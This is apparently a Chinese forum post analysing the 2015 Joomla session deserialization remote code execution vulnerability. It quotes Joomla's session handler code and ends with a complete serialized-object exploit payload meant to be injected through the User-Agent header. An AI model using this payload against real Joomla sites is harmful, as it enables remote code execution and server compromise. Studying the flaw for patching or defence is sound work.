关于今天最新爆出的joomla 0day,经360研究人员分析发现,此为session 反序列代码执行高危漏洞。
代码分析:
此漏洞为session存储机制带来的安全隐患,在php中session是通过序列化存储的,且存储方式有:php、php_binary(php>5.44用php_serialize)、 wddx
PHP默认安装设置session.serialize_handler的值是php,因此seesion的序列化格式为:
键名 + 竖线 + 经过 serialize() 函数反序列处理的值。
Session默认初始化是在所有代码执行之前,然而joomla使用自定义存储session机制,替换了php自带的存储方式使用session_set_save_handler自定义了session存储函数。
public function register()
[PHP] 纯文本查看 复制代码 {
// Use this object as the session handler
session_set_save_handler(
array($this, 'open'), array($this, 'close'), array($this, 'read'), array($this, 'write'),
array($this, 'destroy'), array($this, 'gc')
);
}
public function read($id)
{
// Get the database connection object and verify its connected.
$db = JFactory::getDbo();
try
{
// Get the session data from the database table.
$query = $db->getQuery(true)
->select($db->quoteName('data'))
->from($db->quoteName('#__session'))
->where($db->quoteName('session_id') . ' = ' . $db->quote($id));
$db->setQuery($query);
$result = (string) $db->loadResult();
$result = str_replace('\0\0\0', chr(0) . '*' . chr(0), $result);
return $result;
}
catch (Exception $e)
{
return false;
}
}
public function write($id, $data)
{
// Get the database connection object and verify its connected.
$db = JFactory::getDbo();
$data = str_replace(chr(0) . '*' . chr(0), '\0\0\0', $data);
try
{
$query = $db->getQuery(true)
->update($db->quoteName('#__session'))
->set($db->quoteName('data') . ' = ' . $db->quote($data))
->set($db->quoteName('time') . ' = ' . $db->quote((int) time()))
->where($db->quoteName('session_id') . ' = ' . $db->quote($id));
// Try to update the session data in the database table.
$db->setQuery($query);
if (!$db->execute())
{
return false;
}
/* Since $db->execute did not throw an exception, so the query was successful.
Either the data changed, or the data was identical.
In either case we are done.
*/
return true;
}
catch (Exception $e)
{
return false;
}
}
在session存储的时候并没有对session内容进行过滤,使得我们可以传入恶意代码到seesion序列化字符中。
“键名 + 竖线 + 经过 serialize() 函数反序列处理的值。”
由上这样的序列字符串可以看出当我们在恶意代码中插入|字符,使得反序列解析错误,把|前面的部分全部解析成键名,|后边的部分通过unserialize反序列化。
因此我们可以构造一个exp插入user-agent:
[PHP] 纯文本查看 复制代码 }__test|O:21:"JDatabaseDriverMysqli":3:{s:2:"fc";O:17:"JSimplepieFactory":0:{}s:21:"\0\0\0disconnectHandlers";a:1:{i:0;a:2:{i:0;O:9:"SimplePie":5:{s:8:"sanitize";O:20:"JDatabaseDriverMysql":0:{}s:8:"feed_url";s:37:"phpinfo();JFactory::getConfig();exit;";s:19:"cache_name_function";s:6:"assert";s:5:"cache";b:1;s:11:"cache_class";O:20:"JDatabaseDriverMysql":0:{}}i:1;s:4:"init";}}s:13:"\0\0\0connection";b:1;}ð
"}__test|"
| 
发表于 2015-12-15 17:07:23
发表于 2015-12-15 23:28:04
